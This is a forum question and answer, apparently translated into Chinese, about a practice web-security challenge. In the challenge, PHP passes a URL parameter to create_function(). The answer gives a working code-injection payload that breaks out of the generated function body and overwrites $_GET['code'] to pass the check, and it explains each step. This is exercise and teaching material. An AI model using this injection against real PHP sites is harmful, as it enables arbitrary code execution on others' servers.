PHP 代码注入无效

PHP code injection not working

我发现了一个网站,您可以在其中进行一些有关网络安全的练习。

据我了解,您必须进行 PHP 注射。我在网上查找示例,但仍然无法实现它们。

如有任何帮助或提示,我们将不胜感激,如果这里不适合提出此类问题,请告诉我。

代码:

<body> 
    <div class="corb-centered corb-php text-center"> 
      <h3> 
        <a target="_blank" href="/index.php?source">source</a> 
      </h3> 
      <h3> 
        Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a> 
      </h3> 

      <div class="text-left"> 
        <h3>Output : </h3> 
        <pre><code><?php 
        if (isset($_GET['code'])) { 
          $new_func = create_function('', $_GET['code']); 
          if ($_GET['code'] === "echo 'hello foobar';") { 
            $new_func(); 
          } 
        } 
        ?></code></pre> 
      </div> 
    </div>     
</body> 

我已经尝试了我所知道的一切:

ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...

根据 PHP docs:

Caution This function internally performs an eval() and as such has the same security issues as eval().

这正是本例中可以利用的内容。 PHP 基本上只是将 function __lambda_func(<args>) {<code>} 粘合在一起,然后对其求值。

使用以下代码参数应输出字符串 do something else...

/index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F

解码版本:

} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //

解释版本:

}                                       # end the function body prematurely so the following code is executed immediately
$_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
echo 'do something else..';             # any code that should be executed goes here
//                                      # comment out the function-body closing brace that is added by PHP after the code